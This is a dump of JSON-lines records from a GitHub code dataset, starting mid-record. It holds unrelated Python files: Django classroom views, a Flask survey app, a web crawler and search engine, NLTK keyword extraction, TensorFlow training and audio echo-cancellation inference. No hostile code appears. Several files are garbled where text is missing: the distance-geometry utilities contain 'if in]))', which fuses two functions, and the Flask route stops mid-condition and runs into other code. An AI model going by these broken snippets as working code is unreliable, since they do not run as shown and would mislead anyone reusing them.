submission = submission_model.assignment_submissions.filter(\n student__in=[self.request.user]\n )\n elif model_name == 'test':\n model = apps.get_model(\n app_label='classroom', model_name='test'\n )\n submission_model = get_object_or_404(\n model, id=model_id\n )\n submission = submission_model.test_submissions.filter(\n student__in=[self.request.user]\n )\n else:\n raise Http404()\n form = modelform_factory(model, fields=('text', 'attachment',))\n if submission.exists():\n submission_id = submission[0].id\n form = 
form(instance=submission[0])\n else:\n form = form()\n return render(request, \"partials/submission_form.html\", {'form': form, 'submission_model': submission_model, \"submission_id\": submission_id, 'model_name': model_name, 'model_id': model_id})\n\n def test_func(self):\n return not self.request.user.is_teacher\n\n# submission view for students\n\n\nclass SubmissionCreateUpdateView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(instance=self.submission)\n return render(request, \"partials/submission_form.html\", {'form': form, 'submission_model': self.submission_model, 'submission_id': self.submission_id, 'model_name': self.model_name, 'model_id': self.model_id})\n\n def post(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(\n instance=self.submission, data=self.request.POST, files=self.request.FILES\n )\n if form.is_valid():\n form.instance.student = self.request.user\n if self.submission_model.due_date > timezone.now():\n form.instance.status = 'D'\n else:\n form.instance.status = 'L'\n submission = form.save(commit=False)\n # if new object is created\n if self.submission is None:\n if self.model_name == 'test':\n submission.test = self.submission_model\n else:\n submission.assignment = self.submission_model\n submission = form.save()\n messages.success(\n self.request, f'{self.submission_model.title} ({self.model_name}) Submited !'\n )\n return redirect('dashboard', self.submission_model.classroom.code)\n\n messages.warning(self.request, 'Some Error Occured !')\n return redirect('dashboard', self.submission_model.classroom.code)\n\n def get_model(self, model_name):\n if model_name in ('assignment', 'test',):\n return apps.get_model(app_label='classroom', model_name=f'{model_name}submission')\n return Http404()\n\n def get_form(self, *args, **kwargs):\n form = modelform_factory(self.model, fields=('text', 'attachment',))\n return form(*args, **kwargs)\n\n def get_submission_model(self, model_id, model_name):\n if model_name in ('assignment', 'test',):\n model = apps.get_model(\n app_label='classroom', model_name=model_name\n )\n return get_object_or_404(model, id=model_id)\n return Http404()\n\n def set_objects(self):\n self.model_name = self.kwargs['model_name']\n # model(table) of test or assignment submissions\n self.model = self.get_model(self.model_name)\n # model_id for associating submission with respective assignment/test\n self.model_id = self.kwargs['model_id']\n self.submission_model = self.get_submission_model(\n self.model_id, self.model_name\n )\n # submission of test or assignment\n self.submission = None\n self.submission_id = self.kwargs.get('submission_id')\n if self.submission_id:\n self.submission = get_object_or_404(\n self.model, id=self.submission_id\n )\n\n def test_func(self):\n return not self.request.user.is_teacher\n","repo_name":"DireWolf707/Online-Classroom","sub_path":"classroom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33793083902","text":"from sys import stdin\n\nn = stdin.readline().rstrip()\nm = int(stdin.readline())\nd = set(stdin.readline().split())\nbutton = set(str(x) for x in range(10))\nif m > 0:\n button -= d\n\nnow_chan = 100\nres = abs(now_chan - int(n))\n\nfor channel in range(1000000):\n for j in range(len(str(channel))):\n if str(channel)[j] not in button:\n break\n elif 
len(str(channel)) - 1 == j:\n res = min(res, abs(channel - int(n)) + len(str(channel)))\n\nprint(res)\n","repo_name":"hunnam5220/Solved_ac","sub_path":"100. CLASS/CLASS 3/impossible/1107._*_*_*_ 리모컨.py","file_name":"1107._*_*_*_ 리모컨.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4045958389","text":"import scipy as scp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cvxpy as cp\nfrom amplpy import AMPL \n\n#convert a distance matrix to a Gram matrix\ndef dist2Gram(D):\n n = D.shape[0]\n J = np.eye(n) - (1.0/n)*np.ones((n,n))\n G = -0.5 * J @ (D*D) @ J\n return G\n\n#principal component analysis\ndef PCA(A,K=2):\n n = A.shape[0]\n evals,evecs = np.linalg.eigh(A)\n evals[evals < 0] = 0 # closest SDP matrix\n sqrootdiag = np.sqrt(np.diag(evals))\n X = evecs @ sqrootdiag\n return X[:,n-K:]\n\ndef solve_SDP(D, adjacency_list):\n n = len(adjacency_list)\n G = cp.Variable((n,n), PSD=True) #estimated gram matrix\n \n obj1 = sum([G[i,i]+G[j,j]-2*G[i,j] for i in range(n) for j in adjacency_list[i] if in]))\n return np.mean(errors) \n\ndef LDE(X,D,adjacency_list):\n errors=np.array([])\n for v,a_list in enumerate(adjacency_list):\n errors=np.hstack((errors,\n [np.abs(np.linalg.norm(X[v]-X[n])-D[v,n]) for n in a_list if v>n]))\n return np.max(errors) \n\ndef generate_random_points(N,bounds=np.array([[-1,1],[-1,1]])):\n x_bounds,y_bounds=bounds\n points_x = np.random.uniform(x_bounds[0],x_bounds[1],size=N)\n points_y = np.random.uniform(y_bounds[0],y_bounds[1],size=N)\n return np.transpose(np.vstack((points_x,points_y))) ","repo_name":"Nikita-Dudorov/DGP_planar_graph","sub_path":"code/DGP_utils.py","file_name":"DGP_utils.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9361387483","text":"# -*- coding: utf-8 -*-\n\n'''\nGiven an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0?\nFind all unique triplets in the array which gives the sum of zero.\n\nNote:\nThe solution set must not contain duplicate triplets.\n\nExample:\nGiven array nums = [-1, 0, 1, 2, -1, -4]\nA solution set is:\n[\n [-1, 0, 1],\n [-1, -1, 2]\n]\n'''\n\n\nclass Solution(object):\n\n def three_sum(self, nums):\n length = len(nums)\n if length < 3:\n return []\n\n nums.sort()\n result = []\n for left in range(length - 2):\n if nums[left] > 0:\n break\n if left > 0 and nums[left] == nums[left - 1]:\n continue\n mid, right = left + 1, length - 1\n target = -nums[left]\n while mid < right:\n if nums[mid] + nums[right] == target:\n result.append([nums[left], nums[mid], nums[right]])\n tmp_mid, tmp_right = nums[mid], nums[right]\n while mid < right and nums[mid] == tmp_mid:\n mid += 1\n while mid < right and nums[right] == tmp_right:\n right -= 1\n elif nums[mid] + nums[right] < target:\n mid += 1\n else:\n right -= 1\n \n return result\n\n\nif __name__ == '__main__':\n nums = [-1, 0, 1, 2, -1, -4]\n s = Solution()\n print(s.three_sum(nums))\n\n","repo_name":"lilanxing/leetcode","sub_path":"15_3sum/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41939719318","text":"# this calls all the tools needed\n# also ties in the surveys.py to this code.\nfrom flask import Flask, request, render_template, redirect, flash, session\nfrom flask_debugtoolbar import 
DebugToolbarExtension\nfrom surveys import satisfaction_survey\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"chickenzarenotcool\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\n# this is where we store the responses\n# a variable to help with functions\n# route to home page, has survey start button.\n@app.route('/')\ndef home():\n return render_template('base.html')\n# pulls questions and answers from surveys.py and generates them\n@app.route(f'/questions/<int:qnum>')\ndef question(qnum):\n# the if else is there to assure they answer the questions in order. \n# Prevents skipping around.\n # this first will check if they answered all the questions already.\n print(f\"{qnum} is qnum\")\n #the session way to make the cookie session usable\n responses = session['response']\n session['response'] = responses\n if qnum <= len(satisfaction_survey.questions):\n if qnum == len(responses)+1:\n question = satisfaction_survey.questions[qnum-1].question\n choices = satisfaction_survey.questions[qnum-1].choices\n return render_template('questions.html', question = question, choices = choices)\n else:\n # this if/else responds if the URL is messed with.\n if qnum != 0:\n return redirect(f'/questions/{len(responses)+1}')\n else:\n # flashes a message if they try to jump questions.\n flash(\"Don't mess with the URL. . . \")\n return redirect(f'/questions/{len(responses)+1}')\n\n # this else will thank them if they already answered all the questions and try to start again.\n else:\n return render_template('thanks.html')\n\n\n# this route processes the answers and adds them to the responses list.\n@app.route('/answer', methods=[\"POST\"])\ndef answer():\n choice = request.form['choice']\n #the session way to make the cookie session usable\n responses = session['response']\n responses.append(choice)\n session['response'] = responses\n print (f'{len(responses)} is len')\n# if else checks the length of survey and when they complete all questions\n if (len(responses)= %s' % (','.join(['%s' for _ in words]), '%s'), words + [threshold])\n else:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index WHERE word_id IN (SELECT id FROM words WHERE word IN (%s))' % ','.join(['%s' for _ in words]), words)\n \n results = cursor.fetchall()\n\n page_counts = {}\n for result in results:\n page_id = result[0]\n count = 0\n for word in words:\n cursor.execute('SELECT count FROM inverted_index WHERE word_id = (SELECT id FROM words WHERE word = %s) AND page_id = %s', (word, page_id))\n result = cursor.fetchone()\n if result is not None:\n count += result[0]\n page_counts[page_id] = count\n\n # Sort the pages by the number of occurrences of the search words in each page\n sorted_pages = sorted(page_counts.items(), key=lambda x: x[1], reverse=True)\n\n # Get the URLs for the top 10 pages and return them\n urls = []\n for page_id, count in sorted_pages[:10]:\n cursor.execute('SELECT url FROM pages WHERE id = %s', (page_id,))\n result = cursor.fetchone()\n if result is not None:\n urls.append(result[0])\n conn.close()\n\n return urls[0]\n\n def wn_search(self,query, threshold=None):\n # Preprocess query\n stemmer = SnowballStemmer('english')\n words = [stemmer.stem(w.lower()) for w in query.split()]\n\n self.logger.info(f'Searching WN for {query}')\n\n # Find similar words using WordNet\n synsets = []\n for word in words:\n synset = wordnet.synsets(word)\n if synset:\n synsets.append(synset)\n similar_words = set()\n for synset in synsets:\n for lemma in synset[0].lemmas():\n 
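# note: only the first synset of each query word is expanded (synset[0]), so other word\n # senses are ignored; lemma names are stemmed to stay comparable with the stemmed index terms\n 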
similar_word = stemmer.stem(lemma.name().lower())\n if similar_word not in words:\n similar_words.add(similar_word)\n v = ' '.join(list(similar_words))\n\n self.logger.info(f'WN words: {v}')\n\n # Add similar words to search words\n words = list(similar_words)\n\n conn = self.create_connection()\n cursor = conn.cursor()\n\n # Get the page IDs for all pages that contain any of the words\n if threshold is not None:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index '\n 'JOIN pages ON inverted_index.page_id = pages.id '\n 'WHERE word_id IN (SELECT id FROM words WHERE word IN (%s)) '\n 'AND sentiment >= %s' % (','.join(['%s' for _ in words]), '%s'), words + [threshold])\n else:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index WHERE word_id IN (SELECT id FROM words WHERE word IN (%s))' % ','.join(['%s' for _ in words]), words)\n \n results = cursor.fetchall()\n\n page_counts = {}\n for result in results:\n page_id = result[0]\n count = 0\n for word in words:\n cursor.execute('SELECT count FROM inverted_index WHERE word_id = (SELECT id FROM words WHERE word = %s) AND page_id = %s', (word, page_id))\n result = cursor.fetchone()\n if result is not None:\n count += result[0]\n page_counts[page_id] = count\n\n # Sort the pages by the number of occurrences of all search words in each page\n sorted_pages = sorted(page_counts.items(), key=lambda x: x[1], reverse=True)\n\n # Get the URLs for the top 10 pages and return them\n urls = []\n for page_id, count in sorted_pages[:10]:\n cursor.execute('SELECT url FROM pages WHERE id = %s', (page_id,))\n result = cursor.fetchone()\n if result is not None:\n urls.append(result[0])\n conn.close()\n\n return urls[0]\n\n \"\"\" GENERATE CONTENT \"\"\"\n def generate_content(self, query, threshold=None):\n words = self._preprocess(query)\n self.logger.info(f'Searching for {query}')\n conn = self.create_connection()\n cursor = conn.cursor()\n\n # Get the page IDs for all pages that contain any of the words\n if threshold is not None:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index '\n 'JOIN pages ON inverted_index.page_id = pages.id '\n 'WHERE word_id IN (SELECT id FROM words WHERE word IN (%s)) '\n 'AND sentiment >= %s' % (','.join(['%s' for _ in words]), '%s'), words + [threshold])\n else:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index WHERE word_id IN (SELECT id FROM words WHERE word IN (%s))' % ','.join(['%s' for _ in words]), words)\n \n results = cursor.fetchall()\n\n page_counts = {}\n for result in results:\n page_id = result[0]\n count = 0\n for word in words:\n cursor.execute('SELECT count FROM inverted_index WHERE word_id = (SELECT id FROM words WHERE word = %s) AND page_id = %s', (word, page_id))\n result = cursor.fetchone()\n if result is not None:\n count += result[0]\n page_counts[page_id] = count\n\n # Sort the pages by the number of occurrences of the search words in each page\n sorted_pages = sorted(page_counts.items(), key=lambda x: x[1], reverse=True)\n\n # Get the URLs for the top 10 pages and return them\n urls = []\n for page_id, count in sorted_pages[:10]:\n cursor.execute('SELECT url FROM pages WHERE id = %s', (page_id,))\n result = cursor.fetchone()\n if result is not None:\n urls.append(result[0])\n conn.close()\n\n url = urls[0]\n print(url)\n # Fetch the content for each URL\n conn = self.create_connection()\n cursor = conn.cursor()\n contents = []\n cursor.execute('SELECT content FROM pages WHERE url = %s', (url,))\n result = cursor.fetchone()\n if result is not None:\n 
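# the page text stored by the crawler becomes the Markov corpus below; markovify's\n # make_sentence() can return None when that corpus is too small to chain on\n 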
contents.append(result[0])\n conn.close()\n # Concatenate the fetched contents\n text = \" \".join(contents)\n\n # Generate a phrase using the Markov chain model\n text_model = markovify.Text(text)\n generated_content = text_model.make_sentence()\n\n return generated_content\n\n \"\"\" GENERATE CONTENT WITH CHAT GPT\"\"\"\n def chat_gpt(self, query, threshold=None):\n\n \n generator = pipeline('text-generation', model='gpt2')\n set_seed(42)\n # Extract the generated message from the API response\n generated_message = generator(query, max_length=30, num_return_sequences=5)\n\n return generated_message[0]['generated_text']","repo_name":"heliopn/red_crow","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":15782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20988630108","text":"\"\"\"\nnltk_content_words.py\n\nCreated on Wed Jul 19 2023\n\n@author: Lukas\n\nThis file contains all methods for mining content words using NLTK.\n\"\"\"\n\n# import packages\n\nimport numpy as np\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom spellchecker import SpellChecker\nfrom nltk.corpus import wordnet\nfrom nltk.tokenize import word_tokenize\n\n\nspell = SpellChecker()\n\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('wordnet')\n\n\n# Define functions\n\ndef remove_punctuation(documents: list) -> list:\n \"\"\"\n Given a list of documents, removes all punctuation from each document.\n Punctuation includes all symbols in the string \"symbols\" below.\n\n Parameters\n ----------\n documents : A list of documents, where each document is a string.\n\n Returns\n ----------\n A list of documents, where each document is a string with no punctuation.\n \"\"\"\n symbols = \"!\\\"#$%&()*+-,/:;<=>?@[\\]'^_`{|}~\"\n\n no_punct_documents = []\n for document in documents:\n for i in symbols:\n document = document.replace(i, '')\n if len(document) > 0:\n no_punct_documents.append(document)\n\n return no_punct_documents\n\n\ndef merge_across_linebreaks(documents: list) -> list:\n \"\"\"\n Given a list of documents, merges two parts of a word\n that are separated by a linebreak.\n\n Parameters\n ----------\n documents : A list of documents, where each document is a string.\n\n Returns\n ----------\n A list of documents, where each document is a string with no linebreaks.\n \"\"\"\n merged_documents = []\n for document in documents:\n merged_documents.append(document.replace('-\\n', ''))\n\n return merged_documents\n\n\ndef get_nltk_content_words(documents: list) -> list:\n \"\"\"\n Given a list of documents, returns a list of content words.\n\n Parameters\n ----------\n documents : A list of documents, where each document is a string.\n\n Returns\n ----------\n A list of content words.\n \"\"\"\n all_content_words = set()\n\n for document in documents:\n text = word_tokenize(document)\n pos_tags = nltk.pos_tag(text)\n\n unknown_words = []\n\n # for each noun, check if it is contained in the spellchecker dictionary\n # by using spell.unknown(). 
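(it returns the words it cannot find, so an empty set means the word is known). 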
If not, add it to the list of unknown words.\n for word, tag in pos_tags:\n if tag in ['NN', 'NNS', 'NNP', 'NNPS']:\n if word.lower() in spell.unknown([word.lower()]):\n # merge it with the next word and check if the merged word is in the spellchecker dictionary\n if pos_tags.index((word, tag)) < len(pos_tags) - 1:\n next_word = pos_tags[pos_tags.index((word, tag)) + 1][0]\n merged_word = word + '' + next_word\n if merged_word.lower() in spell.unknown([merged_word.lower()]):\n unknown_words.append(word)\n\n # get content words by selecting all nouns, i.e. 'NN', 'NNS', 'NNP', 'NNPS'\n content_words_raw = [word[0] for word in pos_tags if word[1] in ['NN', 'NNS', 'NNP', 'NNPS']]\n\n # remove stopwords\n content_words = clean_content_words(content_words_raw)\n\n # remove words that are in content_words_raw but not in content_words from pos_tags\n pos_tags = [word for word in pos_tags if not (word[0] in content_words_raw and word[0] not in content_words)] \n\n\n # merge adjacent nouns, replace the two with the merged noun in the pos_tags list\n # repeat this process until no more merges are possible\n while True:\n merged = False\n for i in range(len(pos_tags) - 1):\n if pos_tags[i][1] in ['NN', 'NNS', 'NNP', 'NNPS'] and pos_tags[i+1][1] in ['NN', 'NNS', 'NNP', 'NNPS']:\n pos_tags[i] = (pos_tags[i][0] + ' ' + pos_tags[i+1][0], 'NN')\n pos_tags.pop(i+1)\n merged = True\n break\n if not merged:\n break\n\n # merge preceding adjectives with nouns, replace the two with the merged noun in the pos_tags list\n # repeat this process until no more merges are possible\n while True:\n merged = False\n for i in range(len(pos_tags) - 1):\n if pos_tags[i][1] in ['JJ', 'JJR', 'JJS'] and pos_tags[i+1][1] in ['NN', 'NNS', 'NNP', 'NNPS']:\n pos_tags[i] = (pos_tags[i][0] + ' ' + pos_tags[i+1][0], 'NN')\n pos_tags.pop(i+1)\n merged = True\n break\n if not merged:\n break\n\n # clean content words\n content_words = clean_content_words([word[0] for word in pos_tags if word[1] in ['NN', 'NNS', 'NNP', 'NNPS']])\n\n # add to set of all content words\n all_content_words = all_content_words.union(content_words)\n\n return list(all_content_words)\n\n\ndef clean_content_words(content_words: list) -> set:\n \"\"\"\n Given a set of content words, removes stopwords and words that are too short.\n\n Parameters\n ----------\n content_words : A list of content words.\n\n Returns\n ----------\n A set of content words that are not stopwords and are longer than 2 characters.\n \"\"\"\n # convert content words to set\n content_words = set(content_words)\n\n # convert all words to lowercase\n content_words = set([word.lower() for word in content_words])\n\n # remove stopwords\n stop_words = set(stopwords.words('english'))\n\n # extend the stop words with the following words\n other_words = set(['york', 'states', 'book', 'part', 'cambridge', \n 'harvard', 'institution', 'press', 'even', 'princeton',\n 'united', 'known', 'chapter', 'chicago', 'brookings', \n 'washington', 'oxford', 'paper', 'clarendon', 'hopkins',\n 'cent', 'wiley', 'chapters', 'publishing', 'would', 'first',\n 'american', 'review', 'bureau', 'per', 'em', 'great', 'years',\n 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight',\n 'nine', 'ten', 'zero', 'de', 'reviews', 'graduate', 'volume',\n 'year', 'author', 'authors', 'cent', 'way', 'analysis',\n 'period', 'problem', 'economy', 'economic', 'percent', 'equation',\n 'example', 'countries', 'journal', 'university', 'parameter',\n 'problems', 'discussion', 'solution', 'relation', 'country',\n 'difference', 
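# venue and boilerplate vocabulary specific to this economics corpus\n 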
'coefficient', 'regression', 'method', 'economists',\n 'equations', 'matrix', 'outcome', 'literature', 'nation', 'capita',\n 'assumptions', 'standard', 'others', 'america', 'europe', \n 'parameters', 'argument', 'conclusion', 'economies', 'amsfonts',\n 'stmaryrd', 'xspace', 'fontenc', 'amsmath', 'amssymb', 'aastex',\n 'mathrsfs', 'wncyss', 'amsbsy', 'portland', 'region', 'sumption',\n 'person', 'concept', 'alternative', 'coefficients', 'london',\n 'statistics', 'librium', 'correlation', 'periods', 'outcomes',\n 'success', 'equilib', 'addition', 'economist', 'methods'])\n\n\n content_words = set([word for word in content_words if word not in stop_words])\n\n content_words = set([word for word in content_words if word not in other_words])\n\n content_words = set([word for word in content_words if nltk.pos_tag([word])[0][1] in ['NN', 'NNS', 'NNP', 'NNPS']])\n\n # remove words that are too short\n content_words = set([word for word in content_words if len(word) > 5])\n\n # remove verbs\n content_words = filter_verbs(content_words)\n\n return content_words\n\n\ndef filter_verbs(content_words: set) -> set:\n \"\"\"\n Given a set of content words, removes verbs,\n by using wordnet to check if the words can be lemmatized to a verb.\n\n Parameters\n ----------\n content_words : A set of content words.\n\n Returns\n ----------\n A set of content words that are not verbs.\n \"\"\"\n # convert content words to a list\n content_words = list(content_words)\n\n for word in content_words:\n synsets = wordnet.synsets(word)\n\n for synset in synsets:\n if synset.pos() == 'v':\n content_words.remove(word)\n break\n\n return set(content_words)\n\n\ndef filter_numerical_values(content_words: set) -> set:\n \"\"\"\n Filter out content words that contain a numerical value,\n such as '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'.\n\n Parameters\n ----------\n content_words : A set of content words.\n\n Returns\n ----------\n A set of content words that do not contain a numerical value.\n \"\"\"\n content_words = list(content_words)\n\n for word in content_words:\n if any(char.isdigit() for char in word):\n content_words.remove(word)\n\n return set(content_words)\n\n\ndef combine_text_parts(text: list) -> str:\n \"\"\"\n Given a list of text parts, combines them into a single string.\n\n Parameters\n ----------\n text : A list of text parts.\n\n Returns\n ----------\n A string containing all text parts.\n \"\"\"\n combined_text = ''\n for part in text:\n combined_text += part + ' '\n\n return combined_text\n\n\ndef preprocess_docs(documents: list) -> list:\n \"\"\"\n Given a list of documents, preprocesses them by combining the text parts\n in each document, changing every document to lowercase, and removing line breaks.\n\n Parameters\n ----------\n documents : A list of documents.\n\n Returns\n ----------\n A list of preprocessed documents.\n \"\"\"\n preprocessed_docs = []\n for document in documents:\n # combine text parts\n document = combine_text_parts(document)\n\n # change to lowercase\n document = document.lower()\n\n # remove line breaks\n document = document.replace('\\n', ' ')\n document = document.replace('- ', '')\n\n preprocessed_docs.append(document)\n\n return preprocessed_docs\n\n\ndef get_top_k_content_words(document: str, top: int = 10) -> list:\n \"\"\"\n Given a document, returns the top k content words.\n\n Parameters\n ----------\n document : A string representing a document.\n\n top : An integer representing the number of top content words to return.\n\n Returns\n ----------\n A list of 
the top k content words.\n \"\"\"\n content_words_set = set(get_nltk_content_words([document]))\n content_words_set = filter_numerical_values(filter_verbs(clean_content_words(list(content_words_set))))\n\n word_counts = {}\n\n # count the number of appearances of each content word in each document\n for word in content_words_set:\n word_counts[word] = word_counts.get(word, 0) + document.count(word)\n\n # sort the content words by their counts\n sorted_word_counts = sorted(word_counts.items(), key=lambda x: x[1], reverse=True)\n\n # get the k most frequent content words and return them as a list\n return [word[0] for word in sorted_word_counts[:top]]","repo_name":"LFesser97/Predoc","sub_path":"language_change/nltk_content_words.py","file_name":"nltk_content_words.py","file_ext":"py","file_size_in_byte":11302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3743037495","text":"import tensorflow as tf\nfrom sklearn.metrics import roc_auc_score\nfrom tensorflow.python.platform import gfile\nimport numpy as np\nimport os\nimport data_reader\nfrom train_model import model\n\n\nx, y, test_data, vocabulary = data_reader.load_data()\n\nx_train, x_val = np.concatenate((x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319], x[26349:-300])), np.concatenate((x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349], x[-300:]))\ny_train, y_val = np.concatenate((y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319], y[26349:-300])), np.concatenate((y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349], y[-300:]))\n_index = np.random.permutation(np.arange(len(x_train)))\nx_train = x_train[_index]\ny_train = y_train[_index]\n\narticle_length = x_train.shape[1]\nout_dir = \"logs/\"\nsess = tf.Session()\nwith sess.as_default():\n model_ = model(article_length=article_length,vocab_size=len(vocabulary))\n\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n optimizer = tf.train.AdamOptimizer(2e-4)\n train_op = optimizer.apply_gradients(optimizer.compute_gradients(model_.loss), global_step=global_step)\n \n \n saver = tf.train.Saver(tf.all_variables())\n sess.run(tf.initialize_all_variables())\n ckpt = tf.train.get_checkpoint_state(os.path.join(out_dir, 'checkpoints'))\n\n def eval(x_batch, y_batch):\n feed_dict = {model_.train_articles: x_batch, model_.dropout: 1.0}\n ans1 = sess.run([model_.pred_score], feed_dict)\n auc = roc_auc_score(y_batch,ans1[0])\n if(auc > 0.92):\n test(test_data)\n return True\n print(\"\\n\" + str(auc))\n return False\n \n def test(x_batch):\n len_ = x_batch.shape[0]\n output = open(\"./pre.txt\",\"w\")\n output_ = open(\"./pre_score.txt\",\"w\")\n output__ = open(\"./pre_score1.txt\",\"w\")\n for k in range(len_):\n print(\"running \" + str(k))\n feed_dict = {\n model_.train_articles: np.array([x_batch[k]]), model_.dropout: 1.0\n }\n #ans = sess.run([model_.predictions], feed_dict)\n ans1 = sess.run([model_.pred_score], feed_dict)\n #output.write('%f\\n' % ans[0])\n #output_.write('%f\\n' % ans1[0][0][0])\n output__.write('%f\\n' % (1.0 - ans1[0][0][0]))\n print(\"test_finished!\")\n\n batches = data_reader.batch_iter(zip(x_train, y_train), 16, 10)\n checkpoint_dir = os.path.abspath(os.path.join(out_dir, \"checkpoints\"))\n for 
batch in batches:\n x_batch, y_batch = zip(*batch)\n feed_dict = {model_.train_articles: x_batch,model_.train_labels: y_batch,model_.dropout: 0.5}\n op, step, loss, accuracy = sess.run([train_op, global_step, model_.loss, model_.accuracy],feed_dict)\n print(\"step {}, loss {:g}, acc {:g}\".format(step, loss, accuracy))\n current_step = tf.train.global_step(sess, global_step)\n if current_step % 100 == 0:\n if eval(x_val, y_val):\n break\n saver.save(sess, os.path.join(checkpoint_dir, \"model\"), global_step=current_step)\n","repo_name":"shichaosuper/An-End-to-end-solution-for-Semantic-Modeling","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15651527462","text":"import os\nimport torch\n\nimport numpy as np\nimport soundfile as sf\nfrom tqdm.auto import tqdm\nimport time\n\nfrom model.model_cnn_lstm_causal import ConvLSTM\nfrom model.stft import StftHandler\n\nfrom dataset import DatasetInf, DataLoader\n\n\n\ndef build_model(path_state):\n snapshot = torch.load(\n os.path.join(path_state, 'last_snapshot.tar'),\n map_location='cpu'\n )\n conv_kwargs = dict(\n dim=256,\n conv_expansion_factor=2,\n conv_kernel_size=31,\n conv_dropout=0.1,\n )\n model = ConvLSTM(\n stft=StftHandler(),\n num_layers=4,\n inp_dim=257,\n out_dim=257,\n conv_kwargs=conv_kwargs, )\n\n state_dict = snapshot['model']\n model.load_state_dict(state_dict)\n model.eval()\n for p in model.parameters():\n p.requires_grad = False\n\n return model\n\ndef build_data(folder_path, batch_size):\n np.random.seed(77)\n torch.manual_seed(42)\n farend_path = os.path.join(folder_path, 'farend_speech')\n near_mic_path = os.path.join(folder_path, 'nearend_mic_signal')\n near_speech_path = os.path.join(folder_path, 'nearend_speech')\n\n\n test_dataset = DatasetInf(farend_path, near_mic_path, near_speech_path)\n test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True, pin_memory=True, num_workers=4)\n\n return test_loader\n\n\ndef processing_signal(farend, near_mic, model, t, device):\n first_step = 480\n frame = int(t * 16000 / 1000)\n\n current_frame_farend = farend[:, :first_step]\n rest_signal_farend = farend[:, first_step:]\n\n current_frame_mic = near_mic[:, :first_step]\n rest_signal_mic = near_mic[:, first_step:]\n\n #минимальная необходимая задержка 480 отчетов\n #то есть 30мс\n array_out = torch.zeros(480).to(device)\n print('processing signal by 1 sec')\n t_out = []\n while rest_signal_farend.shape[-1] > 0:\n\n frame_tmp_farend = rest_signal_farend[:, :frame]\n current_frame_farend = torch.cat((current_frame_farend, frame_tmp_farend), 1)\n\n frame_tmp_mic = rest_signal_mic[:, :frame]\n current_frame_mic = torch.cat((current_frame_mic, frame_tmp_mic), 1)\n\n start_time = time.time()\n current_pred = model(current_frame_farend, current_frame_mic)\n print(\"--- %s seconds ---\" % (time.time() - start_time), frame_tmp_farend.shape)\n\n t_out.append(time.time() - start_time)\n array_out = torch.cat((array_out, current_pred[0][-frame:]), 0)\n\n rest_signal_farend = rest_signal_farend[:, frame:]\n rest_signal_mic = rest_signal_mic[:, frame:]\n print(np.mean(t_out))\n return array_out\n\n\ndef processing_1sec(farend, near_mic, model, device):\n farend = torch.from_numpy(farend)\n near_mic = torch.from_numpy(near_mic)\n\n farend = farend.to(device, dtype=torch.float)\n farend = farend.unsqueeze(0)\n\n near_mic = near_mic.to(device, dtype=torch.float)\n near_mic = 
near_mic.unsqueeze(0)\n\n first_step = 16000\n\n current_frame_farend = farend[:, :first_step]\n current_frame_mic = near_mic[:, :first_step]\n\n print('warm up')\n for i in range(2):\n current_pred = model(current_frame_farend, current_frame_mic)\n\n t_out = []\n print('processing 1 sec')\n for i in range(30):\n\n start_time = time.time()\n current_pred = model(current_frame_farend, current_frame_mic)\n print(\"--- %s seconds ---\" % (time.time() - start_time), current_pred.shape)\n\n t_out.append(time.time() - start_time)\n print(np.mean(t_out))\n\ndef main():\n device = 'cpu'\n path_state = './results/cnn_lstm_causal'\n\n model = build_model(path_state)\n model = model.to(device)\n\n val_loader = build_data(folder_path='dataset-test-real', batch_size=1)\n farend, near_mic, target, path_id = next(iter(val_loader))\n\n\n # target = target[0].detach().cpu().numpy()\n\n\n #Проверка на скорость обработки одной секунды сигнала:\n #Обрабатывается только одна секунда сигнала, без записи\n #и без учета предыдущих\n farend_test = farend[0].detach().cpu().numpy()\n near_mic_test = near_mic[0].detach().cpu().numpy()\n test_1 = 